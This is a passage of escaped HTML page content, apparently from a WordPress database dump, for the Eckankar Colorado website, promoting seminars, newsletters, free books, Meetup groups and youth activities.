answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(243123,41209,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px; margin-top: 9px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 